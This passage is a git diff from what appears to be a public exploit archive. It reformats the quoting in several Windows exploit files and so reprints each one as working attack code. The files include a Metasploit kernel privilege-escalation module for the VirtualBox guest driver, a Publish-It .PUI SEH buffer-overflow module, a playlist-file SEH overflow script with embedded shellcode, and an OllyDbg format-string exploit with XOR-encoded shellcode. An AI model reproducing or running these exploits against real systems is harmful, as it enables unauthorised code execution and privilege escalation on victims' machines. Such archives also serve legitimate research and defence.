-       printf(\"Greetz to: Everyone at EEye, Metasploit Crew, Jerome Athias and Expanders - Thanks For The Ideas, Tools and Alpha2 Shell Code\\n\");
+       printf("Exploit Coded by Greg Linares (GLinares.code[at]gmail[dot]com)\n");
+       printf("Greetz to: Everyone at EEye, Metasploit Crew, Jerome Athias and Expanders - Thanks For The Ideas, Tools and Alpha2 Shell Code\n");
        fclose(Exploit);
        return 0;
 }
diff --git a/platforms/windows/local/34333.rb b/platforms/windows/local/34333.rb
index 01b083c4e..534e757e0 100755
--- a/platforms/windows/local/34333.rb
+++ b/platforms/windows/local/34333.rb
@@ -3,9 +3,9 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require \'msf/core\'
-require \'msf/core/exploit/local/windows_kernel\'
-require \'rex\'
+require 'msf/core'
+require 'msf/core/exploit/local/windows_kernel'
+require 'rex'
 
 class Metasploit3 < Msf::Exploit::Local
   Rank = AverageRanking
@@ -18,96 +18,96 @@ class Metasploit3 < Msf::Exploit::Local
 
   def initialize(info={})
     super(update_info(info, {
-      \'Name\'          => \'VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation\',
-      \'Description\'    => %q{
+      'Name'          => 'VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation',
+      'Description'    => %q{
         A vulnerability within the VBoxGuest driver allows an attacker to inject memory they
         control into an arbitrary location they define. This can be used by an attacker to
         overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling
         NtQueryIntervalProfile on Windows XP SP3 systems. This has been tested with VBoxGuest
         Additions up to 4.3.10r93012.
       },
-      \'License\'       => MSF_LICENSE,
-      \'Author\'        =>
+      'License'       => MSF_LICENSE,
+      'Author'        =>
         [
-          \'Matt Bergin \', # Vulnerability discovery and PoC
-          \'Jay Smith \' # MSF module
+          'Matt Bergin ', # Vulnerability discovery and PoC
+          'Jay Smith ' # MSF module
         ],
-      \'Arch\'          => ARCH_X86,
-      \'Platform\'      => \'win\',
-      \'SessionTypes\'  => [ \'meterpreter\' ],
-      \'DefaultOptions\' =>
+      'Arch'          => ARCH_X86,
+      'Platform'      => 'win',
+      'SessionTypes'  => [ 'meterpreter' ],
+      'DefaultOptions' =>
         {
-          \'EXITFUNC\' => \'thread\',
+          'EXITFUNC' => 'thread',
         },
-      \'Targets\'       =>
+      'Targets'       =>
         [
-          [\'Windows XP SP3\',
+          ['Windows XP SP3',
             {
-              \'HaliQuerySystemInfo\' => 0x16bba,
-              \'_KPROCESS\'  => \"\\x44\",
-              \'_TOKEN\'     => \"\\xc8\",
-              \'_UPID\'      => \"\\x84\",
-              \'_APLINKS\'   => \"\\x88\"
+              'HaliQuerySystemInfo' => 0x16bba,
+              '_KPROCESS'  => "\x44",
+              '_TOKEN'     => "\xc8",
+              '_UPID'      => "\x84",
+              '_APLINKS'   => "\x88"
             }
           ]
         ],
-      \'References\'    =>
+      'References'    =>
         [
-          [\'CVE\', \'2014-2477\'],
-          [\'URL\', \'https://www.korelogic.com/Resources/Advisories/KL-001-2014-001.txt\']
+          ['CVE', '2014-2477'],
+          ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-001.txt']
         ],
-      \'DisclosureDate\'=> \'Jul 15 2014\',
-      \'DefaultTarget\' => 0
+      'DisclosureDate'=> 'Jul 15 2014',
+      'DefaultTarget' => 0
     }))
 
   end
 
   def fill_memory(proc, address, length, content)
 
-    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack(\"L\"), nil, [ length ].pack(\"L\"), \"MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN\", \"PAGE_EXECUTE_READWRITE\")
+    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
 
     if not proc.memory.writable?(address)
-      vprint_error(\"Failed to allocate memory\")
+      vprint_error("Failed to allocate memory")
       return nil
     else
-      vprint_good(\"#{address} is now writable\")
+      vprint_good("#{address} is now writable")
     end
 
     result = proc.memory.write(address, content)
 
     if result.nil?
-      vprint_error(\"Failed to write contents to memory\")
+      vprint_error("Failed to write contents to memory")
       return nil
     else
-      vprint_good(\"Contents successfully written to 0x#{address.to_s(16)}\")
+      vprint_good("Contents successfully written to 0x#{address.to_s(16)}")
     end
 
     return address
   end
 
   def check
-    if sysinfo[\"Architecture\"] =~ /wow64/i or sysinfo[\"Architecture\"] =~ /x64/
+    if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
       return Exploit::CheckCode::Safe
     end
 
-    handle = open_device(\'\\\\\\\\.\\\\vboxguest\', \'FILE_SHARE_WRITE|FILE_SHARE_READ\', 0, \'OPEN_EXISTING\')
+    handle = open_device('\\\\.\\vboxguest', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
     if handle.nil?
       return Exploit::CheckCode::Safe
     end
     session.railgun.kernel32.CloseHandle(handle)
 
-    os = sysinfo[\"OS\"]
+    os = sysinfo["OS"]
     unless (os =~ /windows xp.*service pack 3/i)
       return Exploit::CheckCode::Safe
     end
 
-    file_path = expand_path(\"%windir%\") << \"\\\\system32\\\\drivers\\\\vboxguest.sys\"
+    file_path = expand_path("%windir%") << "\\system32\\drivers\\vboxguest.sys"
     unless file?(file_path)
       return Exploit::CheckCode::Unknown
     end
 
     major, minor, build, revision, branch = file_version(file_path)
-    vprint_status(\"vboxguest.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}\")
+    vprint_status("vboxguest.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
 
     unless (major == 4)
       return Exploit::CheckCode::Safe
@@ -129,84 +129,84 @@ class Metasploit3 < Msf::Exploit::Local
 
   def exploit
     if is_system?
-      fail_with(Exploit::Failure::None, \'Session is already elevated\')
+      fail_with(Exploit::Failure::None, 'Session is already elevated')
     end
 
-    if sysinfo[\"Architecture\"] =~ /wow64/i
-      fail_with(Failure::NoTarget, \"Running against WOW64 is not supported\")
-    elsif sysinfo[\"Architecture\"] =~ /x64/
-      fail_with(Failure::NoTarget, \"Running against 64-bit systems is not supported\")
+    if sysinfo["Architecture"] =~ /wow64/i
+      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
+    elsif sysinfo["Architecture"] =~ /x64/
+      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
     end
 
     unless check == Exploit::CheckCode::Vulnerable
-      fail_with(Exploit::Failure::NotVulnerable, \"Exploit not available on this system\")
+      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
     end
 
-    handle = open_device(\'\\\\\\\\.\\\\vboxguest\', \'FILE_SHARE_WRITE|FILE_SHARE_READ\', 0, \'OPEN_EXISTING\')
+    handle = open_device('\\\\.\\vboxguest', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
     if handle.nil?
-      fail_with(Failure::NoTarget, \"Unable to open \\\\\\\\.\\\\vboxguest device\")
+      fail_with(Failure::NoTarget, "Unable to open \\\\.\\vboxguest device")
     end
 
-    print_status(\"Disclosing the HalDispatchTable address...\")
+    print_status("Disclosing the HalDispatchTable address...")
     hal_dispatch_table = find_haldispatchtable
     if hal_dispatch_table.nil?
       session.railgun.kernel32.CloseHandle(handle)
-      fail_with(Failure::Unknown, \"Filed to disclose HalDispatchTable\")
+      fail_with(Failure::Unknown, "Filed to disclose HalDispatchTable")
     else
-      print_good(\"Address successfully disclosed.\")
+      print_good("Address successfully disclosed.")
     end
 
-    print_status(\'Getting the hal.dll base address...\')
-    hal_info = find_sys_base(\'hal.dll\')
-    fail_with(Failure::Unknown, \'Failed to disclose hal.dll base address\') if hal_info.nil?
+    print_status('Getting the hal.dll base address...')
+    hal_info = find_sys_base('hal.dll')
+    fail_with(Failure::Unknown, 'Failed to disclose hal.dll base address') if hal_info.nil?
 
     hal_base = hal_info[0]
-    print_good(\"hal.dll base address disclosed at 0x#{hal_base.to_s(16).rjust(8, \'0\')}\")
-    hali_query_system_information = hal_base + target[\'HaliQuerySystemInfo\']
+    print_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16).rjust(8, '0')}")
+    hali_query_system_information = hal_base + target['HaliQuerySystemInfo']
 
-    print_status(\"Storing the shellcode in memory...\")
+    print_status("Storing the shellcode in memory...")
     this_proc = session.sys.process.open
 
-    restore_ptrs =  \"\\x31\\xc0\"                                         # xor eax, eax
-    restore_ptrs << \"\\xb8\" + [hali_query_system_information].pack(\'V\') # mov eax, offset hal!HaliQuerySystemInformation
-    restore_ptrs << \"\\xa3\" + [hal_dispatch_table + 4].pack(\'V\')        # mov dword ptr [nt!HalDispatchTable+0x4], eax
+    restore_ptrs =  "\x31\xc0"                                         # xor eax, eax
+    restore_ptrs << "\xb8" + [hali_query_system_information].pack('V') # mov eax, offset hal!HaliQuerySystemInformation
+    restore_ptrs << "\xa3" + [hal_dispatch_table + 4].pack('V')        # mov dword ptr [nt!HalDispatchTable+0x4], eax
 
     kernel_shell = token_stealing_shellcode(target)
     kernel_shell_address = 0x1
 
-    buf = \"\\x90\" * 0x6000
-    buf[0, 56] = \"\\x50\\x00\\x00\\x00\" * 14
+    buf = "\x90" * 0x6000
+    buf[0, 56] = "\x50\x00\x00\x00" * 14
     buf[0x5000, kernel_shell.length] = restore_ptrs + kernel_shell
 
     result = fill_memory(this_proc, kernel_shell_address, buf.length, buf)
     if result.nil?
       session.railgun.kernel32.CloseHandle(handle)
-      fail_with(Failure::Unknown, \"Error while storing the kernel stager shellcode on memory\")
+      fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory")
     else
-      print_good(\"Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}\")
+      print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")
     end
 
-    print_status(\"Triggering the vulnerability, corrupting the HalDispatchTable...\")
+    print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
     session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x22a040, 0x1, 140, hal_dispatch_table + 0x4 - 40, 0)
     session.railgun.kernel32.CloseHandle(handle)
 
-    print_status(\"Executing the Kernel Stager throw NtQueryIntervalProfile()...\")
+    print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
     session.railgun.ntdll.NtQueryIntervalProfile(2, 4)
 
-    print_status(\"Checking privileges after exploitation...\")
+    print_status("Checking privileges after exploitation...")
 
     unless is_system?
-      fail_with(Failure::Unknown, \"The exploitation wasn\'t successful\")
+      fail_with(Failure::Unknown, "The exploitation wasn't successful")
     else
-      print_good(\"Exploitation successful!\")
+      print_good("Exploitation successful!")
     end
 
     p = payload.encoded
-    print_status(\"Injecting #{p.length.to_s} bytes to memory and executing it...\")
+    print_status("Injecting #{p.length.to_s} bytes to memory and executing it...")
     if execute_shellcode(p)
-      print_good(\"Enjoy\")
+      print_good("Enjoy")
     else
-      fail_with(Failure::Unknown, \"Error while executing the payload\")
+      fail_with(Failure::Unknown, "Error while executing the payload")
     end
 
   end
diff --git a/platforms/windows/local/36437.rb b/platforms/windows/local/36437.rb
index 209e4525c..e645babb3 100755
--- a/platforms/windows/local/36437.rb
+++ b/platforms/windows/local/36437.rb
@@ -3,7 +3,7 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require \\\\\\\'msf/core\\\\\\\'
+require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
@@ -12,70 +12,70 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      \\\\\\\'Name\\\\\\\'    => \\\\\\\'Publish-It PUI Buffer Overflow (SEH)\\\\\\\',
-      \\\\\\\'Description\\\\\\\'  => %q{
+      'Name'    => 'Publish-It PUI Buffer Overflow (SEH)',
+      'Description'  => %q{
           This module exploits a stack based buffer overflow in Publish-It when
           processing a specially crafted .PUI file. This vulnerability could be
           exploited by a remote attacker to execute arbitrary code on the target
           machine by enticing a user of Publish-It to open a malicious .PUI file.
       },
-      \\\\\\\'License\\\\\\\'    => MSF_LICENSE,
-      \\\\\\\'Author\\\\\\\'    =>
+      'License'    => MSF_LICENSE,
+      'Author'    =>
         [
-          \\\\\\\'Daniel Kazimirow\\\\\\\',  # Original discovery
-          \\\\\\\'Andrew Smith \\\\\\\"jakx_\\\\\\\"\\\\\\\',  # Exploit and MSF Module
+          'Daniel Kazimirow',  # Original discovery
+          'Andrew Smith "jakx_"',  # Exploit and MSF Module
         ],
-      \\\\\\\'References\\\\\\\'  =>
+      'References'  =>
         [
-          [ \\\\\\\'OSVDB\\\\\\\', \\\\\\\'102911\\\\\\\' ],
-          [ \\\\\\\'CVE\\\\\\\', \\\\\\\'2014-0980\\\\\\\' ],
-          [ \\\\\\\'EDB\\\\\\\', \\\\\\\'31461\\\\\\\' ]
+          [ 'OSVDB', '102911' ],
+          [ 'CVE', '2014-0980' ],
+          [ 'EDB', '31461' ]
         ],
-      \\\\\\\'DefaultOptions\\\\\\\' =>
+      'DefaultOptions' =>
         {
-          \\\\\\\'ExitFunction\\\\\\\' => \\\\\\\'process\\\\\\\',
+          'ExitFunction' => 'process',
         },
-      \\\\\\\'Platform\\\\\\\'  => \\\\\\\'win\\\\\\\',
-      \\\\\\\'Payload\\\\\\\'  =>
+      'Platform'  => 'win',
+      'Payload'  =>
         {
-          \\\\\\\'BadChars\\\\\\\' => \\\\\\\"\\\\\\\\x00\\\\\\\\x0b\\\\\\\\x0a\\\\\\\",
-          \\\\\\\'DisableNops\\\\\\\' => true,
-          \\\\\\\'Space\\\\\\\' => 377
+          'BadChars' => "\x00\x0b\x0a",
+          'DisableNops' => true,
+          'Space' => 377
         },
-      \\\\\\\'Targets\\\\\\\'    =>
+      'Targets'    =>
         [
-          [ \\\\\\\'Publish-It 3.6d\\\\\\\',
+          [ 'Publish-It 3.6d',
             {
-              \\\\\\\'Ret\\\\\\\'     =>  0x0046e95a, #p/p/r | Publish.EXE
-              \\\\\\\'Offset\\\\\\\'  =>  1082
+              'Ret'     =>  0x0046e95a, #p/p/r | Publish.EXE
+              'Offset'  =>  1082
             }
           ],
         ],
-      \\\\\\\'Privileged\\\\\\\'  => false,
-      \\\\\\\'DisclosureDate\\\\\\\'  => \\\\\\\'Feb 5 2014\\\\\\\',
-      \\\\\\\'DefaultTarget\\\\\\\'  => 0))
+      'Privileged'  => false,
+      'DisclosureDate'  => 'Feb 5 2014',
+      'DefaultTarget'  => 0))
 
-    register_options([OptString.new(\\\\\\\'FILENAME\\\\\\\', [ true, \\\\\\\'The file name.\\\\\\\', \\\\\\\'msf.pui\\\\\\\']),], self.class)
+    register_options([OptString.new('FILENAME', [ true, 'The file name.', 'msf.pui']),], self.class)
 
   end
 
   def exploit
 
-    path = ::File.join(Msf::Config.data_directory, \\\\\\\"exploits\\\\\\\", \\\\\\\"CVE-2014-0980.pui\\\\\\\")
-    fd = File.open(path, \\\\\\\"rb\\\\\\\")
+    path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0980.pui")
+    fd = File.open(path, "rb")
     template_data = fd.read(fd.stat.size)
     fd.close
 
     buffer = template_data
     buffer << make_nops(700)
     buffer << payload.encoded
-    buffer << make_nops(target[\\\\\\\'Offset\\\\\\\']-payload.encoded.length-700-5)
-    buffer << Rex::Arch::X86.jmp(\\\\\\\'$-399\\\\\\\') #long negative jump -399
-    buffer << Rex::Arch::X86.jmp_short(\\\\\\\'$-24\\\\\\\') #nseh negative jump
+    buffer << make_nops(target['Offset']-payload.encoded.length-700-5)
+    buffer << Rex::Arch::X86.jmp('$-399') #long negative jump -399
+    buffer << Rex::Arch::X86.jmp_short('$-24') #nseh negative jump
     buffer << make_nops(2)
-    buffer << [target.ret].pack(\\\\\\\"V\\\\\\\")
+    buffer << [target.ret].pack("V")
 
-    print_status(\\\\\\\"Creating \\\\\\\'#{datastore[\\\\\\\'FILENAME\\\\\\\']}\\\\\\\' file ...\\\\\\\")
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
     file_create(buffer)
 
   end
diff --git a/platforms/windows/local/36837.rb b/platforms/windows/local/36837.rb
index 2a15e9f0c..846bebfe5 100755
--- a/platforms/windows/local/36837.rb
+++ b/platforms/windows/local/36837.rb
@@ -8,44 +8,44 @@
 # Exploit-db : http://www.exploit-db.com/author/?a=2986
 # Youtube : https://www.youtube.com/user/cutehack3r
 
-header = \"[Playlist]\\r\\n\"
-header << \"NumberOfEntries=1\\r\\n\"
-header << \"File1=http://www.panix.com/web/faq/multimedia/sample.mp3\\r\\n\"
-header << \"Title1=\"
+header = "[Playlist]\r\n"
+header << "NumberOfEntries=1\r\n"
+header << "File1=http://www.panix.com/web/faq/multimedia/sample.mp3\r\n"
+header << "Title1="
 
-nseh_longer = \"\\xeb\\x1E\\x90\\x90\"
-nseh_shorter = \"\\xeb\\x06\\x90\\x90\"
+nseh_longer = "\xeb\x1E\x90\x90"
+nseh_shorter = "\xeb\x06\x90\x90"
 seh = 0x72d119de #pop pop ret from msacm32.drv
-shell = \"\\xdd\\xc1\\xd9\\x74\\x24\\xf4\\xbb\\x2b\\x2b\\x88\\x37\\x5a\\x31\\xc9\" +
-\"\\xb1\\x33\\x83\\xea\\xfc\\x31\\x5a\\x13\\x03\\x71\\x38\\x6a\\xc2\\x79\" +
-\"\\xd6\\xe3\\x2d\\x81\\x27\\x94\\xa4\\x64\\x16\\x86\\xd3\\xed\\x0b\\x16\" +
-\"\\x97\\xa3\\xa7\\xdd\\xf5\\x57\\x33\\x93\\xd1\\x58\\xf4\\x1e\\x04\\x57\" +
-\"\\x05\\xaf\\x88\\x3b\\xc5\\xb1\\x74\\x41\\x1a\\x12\\x44\\x8a\\x6f\\x53\" +
-\"\\x81\\xf6\\x80\\x01\\x5a\\x7d\\x32\\xb6\\xef\\xc3\\x8f\\xb7\\x3f\\x48\" +
-\"\\xaf\\xcf\\x3a\\x8e\\x44\\x7a\\x44\\xde\\xf5\\xf1\\x0e\\xc6\\x7e\\x5d\" +
-\"\\xaf\\xf7\\x53\\xbd\\x93\\xbe\\xd8\\x76\\x67\\x41\\x09\\x47\\x88\\x70\" +
-\"\\x75\\x04\\xb7\\xbd\\x78\\x54\\xff\\x79\\x63\\x23\\x0b\\x7a\\x1e\\x34\" +
-\"\\xc8\\x01\\xc4\\xb1\\xcd\\xa1\\x8f\\x62\\x36\\x50\\x43\\xf4\\xbd\\x5e\" +
-\"\\x28\\x72\\x99\\x42\\xaf\\x57\\x91\\x7e\\x24\\x56\\x76\\xf7\\x7e\\x7d\" +
-\"\\x52\\x5c\\x24\\x1c\\xc3\\x38\\x8b\\x21\\x13\\xe4\\x74\\x84\\x5f\\x06\" +
-\"\\x60\\xbe\\x3d\\x4c\\x77\\x32\\x38\\x29\\x77\\x4c\\x43\\x19\\x10\\x7d\" +
-\"\\xc8\\xf6\\x67\\x82\\x1b\\xb3\\x98\\xc8\\x06\\x95\\x30\\x95\\xd2\\xa4\" +
-\"\\x5c\\x26\\x09\\xea\\x58\\xa5\\xb8\\x92\\x9e\\xb5\\xc8\\x97\\xdb\\x71\" +
-\"\\x20\\xe5\\x74\\x14\\x46\\x5a\\x74\\x3d\\x25\\x3d\\xe6\\xdd\\x84\\xd8\" +
-\"\\x8e\\x44\\xd9\"
+shell = "\xdd\xc1\xd9\x74\x24\xf4\xbb\x2b\x2b\x88\x37\x5a\x31\xc9" +
+"\xb1\x33\x83\xea\xfc\x31\x5a\x13\x03\x71\x38\x6a\xc2\x79" +
+"\xd6\xe3\x2d\x81\x27\x94\xa4\x64\x16\x86\xd3\xed\x0b\x16" +
+"\x97\xa3\xa7\xdd\xf5\x57\x33\x93\xd1\x58\xf4\x1e\x04\x57" +
+"\x05\xaf\x88\x3b\xc5\xb1\x74\x41\x1a\x12\x44\x8a\x6f\x53" +
+"\x81\xf6\x80\x01\x5a\x7d\x32\xb6\xef\xc3\x8f\xb7\x3f\x48" +
+"\xaf\xcf\x3a\x8e\x44\x7a\x44\xde\xf5\xf1\x0e\xc6\x7e\x5d" +
+"\xaf\xf7\x53\xbd\x93\xbe\xd8\x76\x67\x41\x09\x47\x88\x70" +
+"\x75\x04\xb7\xbd\x78\x54\xff\x79\x63\x23\x0b\x7a\x1e\x34" +
+"\xc8\x01\xc4\xb1\xcd\xa1\x8f\x62\x36\x50\x43\xf4\xbd\x5e" +
+"\x28\x72\x99\x42\xaf\x57\x91\x7e\x24\x56\x76\xf7\x7e\x7d" +
+"\x52\x5c\x24\x1c\xc3\x38\x8b\x21\x13\xe4\x74\x84\x5f\x06" +
+"\x60\xbe\x3d\x4c\x77\x32\x38\x29\x77\x4c\x43\x19\x10\x7d" +
+"\xc8\xf6\x67\x82\x1b\xb3\x98\xc8\x06\x95\x30\x95\xd2\xa4" +
+"\x5c\x26\x09\xea\x58\xa5\xb8\x92\x9e\xb5\xc8\x97\xdb\x71" +
+"\x20\xe5\x74\x14\x46\x5a\x74\x3d\x25\x3d\xe6\xdd\x84\xd8" +
+"\x8e\x44\xd9"
 #1020 --> offset in local exploits 
-payload = header + \"A\" * 1020 + nseh_shorter + [seh].pack(\'V\') + shell 
-#380  or 404 (if itunes wasn\'t already loaded)--> offset in remote ones using the itms protocol.
-payload_remote =  header + \"A\" * 380 + nseh_longer + [seh].pack(\'V\') + \"A\" * 16 + nseh_shorter + [seh].pack(\'V\') +  shell 
+payload = header + "A" * 1020 + nseh_shorter + [seh].pack('V') + shell 
+#380  or 404 (if itunes wasn't already loaded)--> offset in remote ones using the itms protocol.
+payload_remote =  header + "A" * 380 + nseh_longer + [seh].pack('V') + "A" * 16 + nseh_shorter + [seh].pack('V') +  shell 
 
 # when using as local exploit
-open(\'exploit.pls\', \'w\') { |f|
+open('exploit.pls', 'w') { |f|
   f.puts payload
 }
-puts(\'local file created\')
+puts('local file created')
 
 # place this in a web server and use the itms:// protocol to load it.
-open(\'exploit_remote.pls\', \'w\') { |f|
+open('exploit_remote.pls', 'w') { |f|
   f.puts payload_remote
 }
-puts(\'remote file created\')
+puts('remote file created')
diff --git a/platforms/windows/local/3757.txt b/platforms/windows/local/3757.txt
index 151ded008..d4eaba4d8 100755
--- a/platforms/windows/local/3757.txt
+++ b/platforms/windows/local/3757.txt
@@ -25,15 +25,15 @@ You can use it for your AntiCrack tricks against vuln OllyDbg
 #include 
 #include 
 
-#define FORMAT_STRING       \"%4602u\"
+#define FORMAT_STRING       "%4602u"
 #define XOR_DWORD           0x02020202
 
 #ifdef __BORLANDC__
 #   pragma option -w-asc
 #   pragma option -w-eff
 #else
-#pragma comment(linker,\"/ENTRY:WinMain\") 
-#pragma comment(lib, \"msvcrt.lib\") 
+#pragma comment(linker,"/ENTRY:WinMain") 
+#pragma comment(lib, "msvcrt.lib") 
 #endif
 
 
@@ -43,22 +43,22 @@ You can use it for your AntiCrack tricks against vuln OllyDbg
 // because of bounds check on user-supplied data ,see below
 // char buffer[256];
 // snprintf(buffer,256,user_buffer);
-// buffer[255]= \'\\0\';
+// buffer[255]= '\0';
 char shellcode[] =
-	\"\\xEB\\x0F\\x58\\x80\\x30\\x02\\x40\\x81\\x38\\x4F\\x4C\\x4C\\x41\\x75\\xF4\\xEB\\x05\"
-	\"\\xE8\\xEC\\xFF\\xFF\\xFF\\x57\\x89\\xEE\\x81\\xEE\\x0E\\xEA\\x02\\x02\\x02\\x02\\x5A\"
-	\"\\x2F\\x91\\x15\\x42\\x02\\x8B\\x47\\xF6\\x68\\x42\\x07\\x48\\x1A\\x42\\x02\\x52\\x89\"
-	\"\\x47\\xF6\\x07\\xD7\\x15\\x42\\x02\\x52\\x68\\x02\\xBA\\x01\\x01\\x01\\x01\\xFD\\xD2\"
-	\"\\x68\\x07\\x89\\x47\\xF6\\x07\\x50\\x1A\\x42\\x02\\x52\\xBA\\x07\\x07\\x07\\x07\\xFD\"
-	\"\\xD2\\x68\\x02\\xBA\\x06\\x06\\x06\\x06\\xFD\\xD2\\x89\\xE7\\x5F\\xC1\\x43\\x76\\x76\"
-	\"\\x63\\x61\\x69\\x22\\x6B\\x71\\x22\\x71\\x77\\x61\\x61\\x67\\x71\\x71\\x64\\x77\\x6E\"
-	\"\\x23\\x08\\x08\\x55\\x67\\x22\\x63\\x70\\x67\\x22\\x6B\\x6C\\x22\\x76\\x6A\\x67\\x22\"
-	\"\\x72\\x70\\x6D\\x61\\x67\\x71\\x71\\x22\\x61\\x6D\\x6C\\x76\\x67\\x7A\\x76\\x22\\x6D\"
-	\"\\x64\\x22\\x4D\\x6E\\x6E\\x7B\\x46\\x60\\x65\\x2C\\x67\\x7A\\x67\\x08\\x6C\\x6D\\x75\"
-	\"\\x22\\x75\\x67\\x22\\x75\\x6B\\x6E\\x6E\\x22\\x6E\\x63\\x77\\x6C\\x61\\x6A\\x22\\x61\"
-	\"\\x63\\x6E\\x61\\x2C\\x67\\x7A\\x67\\x22\\x2A\\x75\\x6B\\x6C\\x66\\x6D\\x75\\x71\\x22\"
-	\"\\x61\\x63\\x6E\\x61\\x77\\x6E\\x63\\x76\\x6D\\x70\\x2B\\x02\\x4D\\x6E\\x6E\\x7B\\x46\"
-	\"\\x60\\x65\\x02\\x61\\x63\\x6E\\x61\\x02\\x61\\x63\\x6E\\x61\\x02\\x4F\\x4C\\x4C\\x41\";
+	"\xEB\x0F\x58\x80\x30\x02\x40\x81\x38\x4F\x4C\x4C\x41\x75\xF4\xEB\x05"
+	"\xE8\xEC\xFF\xFF\xFF\x57\x89\xEE\x81\xEE\x0E\xEA\x02\x02\x02\x02\x5A"
+	"\x2F\x91\x15\x42\x02\x8B\x47\xF6\x68\x42\x07\x48\x1A\x42\x02\x52\x89"
+	"\x47\xF6\x07\xD7\x15\x42\x02\x52\x68\x02\xBA\x01\x01\x01\x01\xFD\xD2"
+	"\x68\x07\x89\x47\xF6\x07\x50\x1A\x42\x02\x52\xBA\x07\x07\x07\x07\xFD"
+	"\xD2\x68\x02\xBA\x06\x06\x06\x06\xFD\xD2\x89\xE7\x5F\xC1\x43\x76\x76"
+	"\x63\x61\x69\x22\x6B\x71\x22\x71\x77\x61\x61\x67\x71\x71\x64\x77\x6E"
+	"\x23\x08\x08\x55\x67\x22\x63\x70\x67\x22\x6B\x6C\x22\x76\x6A\x67\x22"
+	"\x72\x70\x6D\x61\x67\x71\x71\x22\x61\x6D\x6C\x76\x67\x7A\x76\x22\x6D"
+	"\x64\x22\x4D\x6E\x6E\x7B\x46\x60\x65\x2C\x67\x7A\x67\x08\x6C\x6D\x75"
+	"\x22\x75\x67\x22\x75\x6B\x6E\x6E\x22\x6E\x63\x77\x6C\x61\x6A\x22\x61"
+	"\x63\x6E\x61\x2C\x67\x7A\x67\x22\x2A\x75\x6B\x6C\x66\x6D\x75\x71\x22"
+	"\x61\x63\x6E\x61\x77\x6E\x63\x76\x6D\x70\x2B\x02\x4D\x6E\x6E\x7B\x46"
+	"\x60\x65\x02\x61\x63\x6E\x61\x02\x61\x63\x6E\x61\x02\x4F\x4C\x4C\x41";
 
 DWORD SearchStream(
     const char *pvStream,
@@ -91,10 +91,10 @@ DWORD SearchStream(
 
 DWORD FindRetToEspAddress(VOID)
 {
-    HMODULE hModule = GetModuleHandle(\"kernel32.dll\");
+    HMODULE hModule = GetModuleHandle("kernel32.dll");
     DWORD dwEspRet;
-    char* pszCallEsp = \"\\xFF\\xD4\"; // CALL ESP
-    //char* pszJmpEsp  = \"\\xFF\\xE4\"; // JMP ESP
+    char* pszCallEsp = "\xFF\xD4"; // CALL ESP
+    //char* pszJmpEsp  = "\xFF\xE4"; // JMP ESP
 
     PIMAGE_DOS_HEADER pimage_dos_header;
     PIMAGE_NT_HEADERS pimage_nt_headers;
@@ -112,9 +112,9 @@ int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine
     char* pszEvilBuffer;
     ULONG ulEvilBufSize;
 
-    DWORD dw_MessageBoxA    = (DWORD)GetProcAddress(LoadLibrary(\"user32.dll\"),\"MessageBoxA\")^XOR_DWORD;
-    DWORD dw_WinExec        = (DWORD)GetProcAddress(GetModuleHandle(\"kernel32.dll\"),\"WinExec\")^XOR_DWORD;
-    DWORD dw_ExitProcess    = (DWORD)GetProcAddress(GetModuleHandle(\"kernel32.dll\"),\"ExitProcess\")^XOR_DWORD;
+    DWORD dw_MessageBoxA    = (DWORD)GetProcAddress(LoadLibrary("user32.dll"),"MessageBoxA")^XOR_DWORD;
+    DWORD dw_WinExec        = (DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"WinExec")^XOR_DWORD;
+    DWORD dw_ExitProcess    = (DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"ExitProcess")^XOR_DWORD;
 
     DWORD dwRetAddr = FindRetToEspAddress();
 
diff --git a/platforms/windows/local/37755.c b/platforms/windows/local/37755.c
index 6f6e4cb64..0016c4f40 100755
--- a/platforms/windows/local/37755.c
+++ b/platforms/windows/local/37755.c
@@ -129,13 +129,13 @@ BOOL WINAPI CreateNewCmdProcess (STARTUPINFO *startupInformation, PROCESS_INFORM
         // Start the child process.
         return CreateProcess (
                 NULL,                                                           // No module name (use command line)
-                \"c:\\\\windows\\\\system32\\\\cmd.exe /K cd c:\\\\windows\\\\system32\",   // Start cmd.exe
+                "c:\\windows\\system32\\cmd.exe /K cd c:\\windows\\system32",   // Start cmd.exe
                 NULL,                                                           // Process handle not inheritable
                 NULL,                                                           // Thread handle not inheritable
                 TRUE,                                                           // Set handle inheritance to TRUE
                 0,                                                              // No creation flags
-                NULL,                                                           // Use parent\'s environment block
-                NULL,                                                           // Use parent\'s starting directory
+                NULL,                                                           // Use parent's environment block
